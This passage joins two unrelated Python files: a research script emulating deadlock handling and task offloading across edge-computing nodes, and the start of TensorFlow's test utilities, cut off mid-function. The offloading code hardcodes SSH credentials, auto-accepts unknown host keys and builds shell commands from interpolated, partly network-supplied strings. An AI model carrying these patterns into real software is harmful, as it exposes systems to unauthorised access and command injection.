't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
offload_register = {} # {task: host_ip}
mec_rtt = {} # {ip: [RTT]}
prev_t = 0 # variable for cpu util
_cpu = [] # cpu plot list
_off_mec = 0 # used to keep a count of tasks offloaded to mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_pos = 0 # tracks position of tasks and time
fig = plt.figure()
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(222)
ax3 = fig.add_subplot(223)
ax4 = fig.add_subplot(224)
def _mov_avg(a1):
ma1=[] # moving average list
avg1=0 # movinf average pointwise
count=0
for i in range(len(a1)):
count+=1
avg1=((count-1)*avg1+a1[i])/count
ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return ma1
def plot_offloaded_remote():
keys = ['MEC', 'Cloud', 'Local']
val = [_off_mec, _off_cloud, _loc]
cols = ['r', 'g', 'b']
explode = []
for i in val:
if i == max(val):
explode.append(0.1)
else:
explode.append(0)
ax1.pie(val, labels=keys, autopct='%.3f%%', shadow=True, explode=explode, colors=cols)
ax1.set_title('Remote vs Local Frequency')
plt.subplot(ax1)
def plot_wait_time():
ax2.grid(True, color='k')
for i in mec_waiting_time:
ax2.plot(_mov_avg(mec_waiting_time[i]), linewidth=5, label=i)
ax2.set_title('Waiting Time Queue')
ax2.set_ylabel('Moving Wait + RTT')
# ax2.set_xlabel('Time (seconds)')
ax2.legend()
plt.subplot(ax2)
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def plot_rtts():
get_mec_rtts()
ax3.grid(True, color='k')
for i in mec_rtt:
ax3.plot(_mov_avg(mec_rtt[i]), linewidth=5, label=i)
ax3.set_title('RTT Utilization over Time')
ax3.set_ylabel('Moving RTT')
ax3.set_xlabel('Time (seconds)')
ax3.legend()
plt.subplot(ax3)
def plot_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(delta)
# plot graph
ax4.grid(True, color='k')
ax4.plot(_mov_avg(_cpu), linewidth=5, label='CPU')
ax4.set_title('Moving CPU Utilization')
ax4.set_ylabel('Moving CPU')
ax4.set_xlabel('Time (seconds)')
ax4.fill_between(list(range(len(_mov_avg(_cpu)))), _mov_avg(_cpu), 0)
ax4.legend()
plt.subplot(ax4)
def plot_graphs():
plot_offloaded_remote()
plot_wait_time()
plot_rtts()
plot_cpu()
fig.suptitle('MEC Performance During Deadlock Experiment')
def show_graphs():
drawnow(plot_graphs)
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_rtt(host):
rtt = pc.verbose_ping(host)
return rtt
def gcd(a, b):
if b == 0: return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def get_edf():
global tasks
global _pos
tasks = data.task[_pos]
_pos += 1
'''
tasks = {}
while len(tasks) < 3:
a = list(_tasks.keys())[gosh_dist(5)]
tasks[a] = _tasks[a]
'''
print('Running RMS on Tasks: ', tasks, '\n')
waiting_time_init()
return edf()
def waiting_time_init():
global t_time
t_time = {i: [round(r.uniform(0.4, 0.8), 3), round((tasks[i]['period']) / (tasks[i]['wcet']), 3)] for i in
tasks} # t_time = {'ti': [execution_time, latency], ..}
t_time = {**t_time, **check_mec_offload()}
print('[Execution_time, Latency]: ', t_time)
def edf():
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# print(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# print('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm/period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead+tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
print(ready_task)
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
while (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_//tasks[i[0]]['period'])+1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
print('Deadline missed: ', i)
missed.append(i[0])
print('s : ', schedule)
print('r: ', register)
if len(missed) > 0:
print('missed deadline: ', missed)
cooperative_mec(missed, 0)
return offloaded + schedule
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', n_need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload, 0)
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
global P
global R
# Number of processes
P = len(pro)
# Number of resources
R = 3
processes = ['{}_{}'.format(pro[i], i) for i in range(P)]
# Available instances of resources
avail = [7, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = '_'.join(i.split('_')[:-1]) # i = 't5_3_3', j = 't5_3'
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
w_send = time_dic[list(time_dic.keys())[-1]]
send_message(str(w_send)) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time['_'.join(i.split('_')[:-1])][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return avg1
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + message()
sock.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def message():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message():
while True:
data, address = sock.recvfrom(1024)
if data.decode()[:5] == 'hello':
hosts[data.decode()[6:]] = address[0]
if address[0] != host_ip:
mec_rtt[address[0]] = []
elif (data.decode()[:6] != 'update') and (address[0] != host_ip):
w_time = calculate_mov_avg(address[0], float(data.decode()) + get_rtt(address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if address[0] in mec_waiting_time:
mec_waiting_time[address[0]].append(w_time)
else:
mec_waiting_time[address[0]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def mec_task_unicast(task, host_):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
cmd = ('echo "{} {} {}" >> /home/mec/deadlock_project/temp/task_share.txt'.format(host_ip, task, t_time[task[:2]])) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def cooperative_mec(mec_list, n):
global _off_cloud
global _off_mec
for i in mec_list:
_host = mec_comparison()
if _host == 0:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
_off_cloud += 1
elif n == 0:
j = '_'.join(i.split('_')[:-1])
if mec_waiting_time[_host][-1] < t_time[j][1]: # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN TASK LATENCY
mec_task_unicast(i, _host) # SENDS TASK TO MEC FOR EXECUTION
mec_waiting_time[_host].append(mec_waiting_time[_host][-1] + t_time[j][0]) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
_off_mec += 1
else:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
_off_cloud += 1
else:
j = '_'.join(i.split('_')[:-1])
if mec_waiting_time[_host][-1] < t_time[j][1]: # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN TASK LATENCY
mec_task_unicast(i, _host) # SENDS TASK TO MEC FOR EXECUTION
mec_waiting_time[_host].append(mec_waiting_time[_host][-1] + t_time[j][0]) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
_off_mec += 1
else:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
_off_cloud += 1
def check_mec_offload():
global offloaded
offloaded = []
t_mec = {} # {t1: [execution, latency}
try:
fr = open('/home/mec/deadlock_project/temp/task_share.txt', 'r')
t = fr.readlines()
for i in t:
ta = i[:-1].split()[1][:2] + '_' + str(t.index(i))
offloaded.append(ta)
offload_register[ta] = i[:-1].split()[0]
t_mec[ta] = ast.literal_eval(''.join(i[:-1].split()[2:]))
fr.close()
os.system('rm /home/mec/deadlock_project/temp/task_share.txt')
print('Tasks Offloaded to MEC: {}'.format(offloaded))
except Exception as e:
print('no offloaded Task!')
return t_mec
def execute(local):
print('\nExecuting :', local)
send = []
for i in local:
j = '_'.join(i.split('_')[:-1])
time.sleep(t_time[j][0])
print('#' *((local.index(i) + 1) * 3), ' Executed: ', i)
if len(j) > 2:
send.append(j)
print('============== EXECUTION DONE ===============')
return send
def send_back_task(l_list):
_host_ip = ip_address()
for i in l_list:
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(offload_register[i], port, un, pw)
cmd = ('echo "{} {}" >> /home/mec/deadlock_project/temp/executed.txt'.format(i, _host_ip)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def receive_executed_task():
try:
fr = open('/home/mec/deadlock_project/temp/executed.txt', 'r')
t = fr.readlines()
for i in t:
i = i[:-1].split()
print('Received Executed task {} from {}'.format(i[0], i[1]))
fr.close()
os.system('rm /home/mec/deadlock_project/temp/executed.txt')
except Exception as e:
print('No Executed Tasks from MEC Received')
def run_me():
initialization()
while True:
if len(hosts) == mec_no:
print('MEC Details: ', hosts)
del hosts[message()]
break
time.sleep(2)
start_loop()
def start_loop():
global _loc
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
while True:
x = gp.getpass('Press any key to Start...').lower()
if x != 'exit':
for i in range(500):
edf_list = get_edf()
print('RMS List of Processes: ', edf_list, '\n')
print('\nRunning Bankers Algorithm')
list_seq = get_exec_seq(edf_list)
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1])
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0], 1)
local_ = execute(compare_result[1])
if len(local_) > 0: # do only when there is a task to send back
send_back_task(local_)
receive_executed_task()
show_graphs() # shows graph plots
time.sleep(3)
print('\nEnter "Exit" to stop Programme!')
if x == 'exit':
print('\nProgramme Terminated')
cmd = 'echo "wt_11_{} = {} \nrtt_11_{} = {} \ncpu_11_{} = {} ' \
'\noff_mec11_{} = {}' \
'\noff_cloud11_{} = {} \nloc11_{} = {}" >> data.py'.format(mec_no,
mec_waiting_time,
mec_no,
mec_rtt,
mec_no,
_cpu,
mec_no,
_off_mec,
mec_no,
_off_cloud,
mec_no,
_loc
)
os.system(cmd)
break
def initialization():
global mec_no
global host_ip
global cloud_ip
host_ip = ip_address()
try:
mec_no = int(input('Number of MECs: ').strip())
cloud_ip = input('Cloud Server IP: ').strip()
print('\nCompiling MEC Details')
h1 = Thread(target=receive_message)
h1.start()
while True:
b = input('Send Hello Message (Y/N): ').strip().lower()
if b == 'y':
send_message('hello')
break
else:
print('\nPlease Type "y" to send Hello message\n')
except KeyboardInterrupt:
print('\nProgramme Terminated')
exit(0)
def main():
os.system('clear')
run_me()
if __name__ == "__main__":
main()
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If the C API is already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C API by default
# without breaking these tests.
if ops._USE_C_API: return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj, (
ops.Tensor,
variables.Variable,
tensor_shape.Dimension,
tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects()
if _is_tensorflow_object(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().ones_rank_cache().flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error(
"Object %d of %d" % (i, len(gc.garbage) - previous_garbage))
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s" % (_safe_object_str(obj),))
logging.error(" Referrer types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referrers(obj)]),))
logging.error(" Referent types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referents(obj)]),))
logging.error(" Object attribute names: %s" % (dir(obj),))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
